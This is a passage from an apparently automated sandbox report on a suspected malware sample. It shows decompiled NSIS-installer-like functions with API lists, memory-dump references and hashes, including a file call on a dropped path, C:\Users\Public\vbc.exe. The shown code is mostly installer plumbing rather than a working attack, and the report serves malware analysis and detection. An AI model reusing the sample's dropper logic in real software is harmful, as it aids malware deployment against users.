              0x0040160d
              0x00401602
              0x00401612
              0x00401615
              0x00401617
              0x00401618
              0x004015c8
              0x0040161f
              0x0040164a
              0x00402197
              0x00401621
              0x00401623
              0x0040162e
              0x00401634
              0x0040163c
              0x00401642
              0x00401642
              0x0040163c
              0x004028c1
              0x004028cd

              APIs
                • Part of subcall function 0040574E: CharNextA.USER32(00405500), ref: 0040575C
                • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 1892508949-2935972921
              • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
              • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
              • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
              • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401389, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
              Download Yara Rule
              C-Code - Quality: 69%
              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ec50; // 0x505b54
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e40c =  *0x42e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
					}
				}
				return 0;
			}












              0x0040138a
              0x004013fa
              0x00401392
              0x0040139b
              0x004013a0
              0x00000000
              0x00000000
              0x004013a2
              0x004013a3
              0x004013ad
              0x00000000
              0x00401404
              0x004013b0
              0x004013b7
              0x004013bd
              0x004013be
              0x004013c0
              0x004013c2
              0x004013b9
              0x004013b9
              0x004013ba
              0x004013ba
              0x004013c9
              0x004013cb
              0x004013f4
              0x004013f4
              0x004013c9
              0x00000000

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend
              • String ID: T[P
              • API String ID: 3850602802-2798684693
              • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
              • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
              • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
              • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405F57(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EE9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





              0x00405f5f
              0x00405f62
              0x00405f69
              0x00405f71
              0x00405f7d
              0x00000000
              0x00405f84
              0x00405f74
              0x00405f7b
              0x00000000
              0x00405f8c
              0x00000000

              APIs
              • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
              • GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
                • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
              • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
              • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
              • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E0040589E(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





              0x004058a2
              0x004058af
              0x004058c4
              0x004058ca

              APIs
              • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 004058A2
              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
              • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
              • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
              • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0040587F(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




              0x00405883
              0x0040588c
              0x00000000
              0x00405895
              0x0040589b

              APIs
              • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
              • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
              • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
              • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004053F2(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




              0x004053f8
              0x00405400
              0x00000000
              0x00405406
              0x00000000

              APIs
              • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
              • GetLastError.KERNEL32 ref: 00405406
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
              • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
              • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
              • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004030B0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





              0x004030b4
              0x004030c7
              0x004030cf
              0x00000000
              0x004030d6
              0x00000000
              0x004030d8

              APIs
              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 004030C7
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
              • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
              • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
              • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004030E2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




              0x004030f0
              0x004030f6

              APIs
              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000087E4), ref: 004030F0
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
              • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
              • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
              • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00404FF1, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 278windowclipboardmemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e404; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x42a0a0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e3ec - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42ec28, 8);
							__eflags =  *0x42ecac - _t149; // 0x0
							if(__eflags == 0) {
								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
							}
							E00403E5C(1);
							goto L25;
						}
						 *0x429468 = 2;
						E00403E5C(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EEA(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e3f0, _t149);
						ShowWindow(_t154, 8);
						E00403EB8(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ec30; // 0x504d60
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e404 = _t127;
				_v8 = _t127;
				E00403EB8( *0x42e3f0);
				 *0x42e3f4 = E00404755(4);
				 *0x42e40c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E83(_a4);
				if(( *0x42ec38 & 0x00000003) != 0) {
					ShowWindow( *0x42e3f0, _t149);
					if(( *0x42ec38 & 0x00000002) != 0) {
						 *0x42e3f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EB8( *0x42e3e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ec38 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































              0x00404ffa
              0x00405000
              0x00405009
              0x0040500c
              0x0040519d
              0x004051a4
              0x004051c8
              0x004051c8
              0x004051ce
              0x004051db
              0x004051f9
              0x004051f9
              0x00405200
              0x00405257
              0x00405257
              0x0040525b
              0x00000000
              0x00000000
              0x0040525d
              0x00405260
              0x00000000
              0x00000000
              0x0040526a
              0x00405270
              0x00405272
              0x00405275
              0x0040536e
              0x00000000
              0x0040536e
              0x00405284
              0x00405290
              0x00405296
              0x00405299
              0x0040529c
              0x004052b1
              0x004052b4
              0x004052b4
              0x004052b7
              0x0040529e
              0x004052a3
              0x004052a9
              0x004052ac
              0x004052ac
              0x004052c7
              0x004052cf
              0x004052d0
              0x004052d2
              0x004052db
              0x004052de
              0x004052e5
              0x004052ec
              0x004052f4
              0x004052f4
              0x00405302
              0x00405308
              0x0040530b
              0x0040530b
              0x00405312
              0x00405318
              0x00405321
              0x00405328
              0x00405331
              0x00405333
              0x00405336
              0x00405345
              0x00405347
              0x0040534d
              0x0040534e
              0x0040534f
              0x0040534f
              0x00405357
              0x00405362
              0x00405368
              0x00405368
              0x00000000
              0x004052d2
              0x00405202
              0x00405208
              0x00405238
              0x0040523a
              0x00405240
              0x0040524b
              0x0040524b
              0x00405252
              0x00000000
              0x00405252
              0x0040520c
              0x00405216
              0x00000000
              0x004051dd
              0x004051dd
              0x004051e3
              0x0040521b
              0x00000000
              0x00405224
              0x004051ec
              0x004051f1
              0x004051f4
              0x00000000
              0x004051f4
              0x004051db
              0x00405012
              0x00405016
              0x0040501f
              0x00405026
              0x00405029
              0x0040502c
              0x0040502f
              0x00405030
              0x00405031
              0x0040504a
              0x0040504d
              0x00405057
              0x00405066
              0x0040506e
              0x00405076
              0x0040507b
              0x0040507e
              0x0040508a
              0x00405093
              0x0040509c
              0x004050bf
              0x004050c5
              0x004050d6
              0x004050db
              0x004050e9
              0x004050f7
              0x004050f7
              0x004050fc
              0x0040510a
              0x0040510a
              0x0040510f
              0x00405112
              0x00405117
              0x00405123
              0x0040512c
              0x00405139
              0x00405148
              0x0040513b
              0x00405140
              0x00405140
              0x00405154
              0x00405154
              0x00405168
              0x00405171
              0x0040517a
              0x0040518a
              0x00405196
              0x00405196
              0x00000000

              APIs
              • GetDlgItem.USER32(?,00000403), ref: 00405050
              • GetDlgItem.USER32(?,000003EE), ref: 0040505F
              • GetClientRect.USER32 ref: 0040509C
              • GetSystemMetrics.USER32 ref: 004050A4
              • SendMessageA.USER32 ref: 004050C5
              • SendMessageA.USER32 ref: 004050D6
              • SendMessageA.USER32 ref: 004050E9
              • SendMessageA.USER32 ref: 004050F7
              • SendMessageA.USER32 ref: 0040510A
              • ShowWindow.USER32(00000000,?), ref: 0040512C
              • ShowWindow.USER32(?,00000008), ref: 00405140
              • GetDlgItem.USER32(?,000003EC), ref: 00405161
              • SendMessageA.USER32 ref: 00405171
              • SendMessageA.USER32 ref: 0040518A
              • SendMessageA.USER32 ref: 00405196
              • GetDlgItem.USER32(?,000003F8), ref: 0040506E
                • Part of subcall function 00403EB8: SendMessageA.USER32 ref: 00403EC6
              • GetDlgItem.USER32(?,000003EC), ref: 004051B3
              • CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
              • CloseHandle.KERNEL32(00000000), ref: 004051C8
              • ShowWindow.USER32(00000000), ref: 004051EC
              • ShowWindow.USER32(00000000,00000008), ref: 004051F1
              • ShowWindow.USER32(00000008), ref: 00405238
              • SendMessageA.USER32 ref: 0040526A
              • CreatePopupMenu.USER32 ref: 0040527B
              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405290
              • GetWindowRect.USER32 ref: 004052A3
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
              • SendMessageA.USER32 ref: 00405302
              • OpenClipboard.USER32(00000000), ref: 00405312
              • EmptyClipboard.USER32 ref: 00405318
              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
              • GlobalLock.KERNEL32 ref: 0040532B
              • SendMessageA.USER32 ref: 0040533F
              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
              • SetClipboardData.USER32 ref: 00405362
              • CloseClipboard.USER32 ref: 00405368
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: `MP${
              • API String ID: 590372296-1827497746
              • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
              • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
              • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
              • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404802, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
              Download Yara Rule
              C-Code - Quality: 98%
              			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42ec48; // 0x504f0c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42ec30; // 0x504d60
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
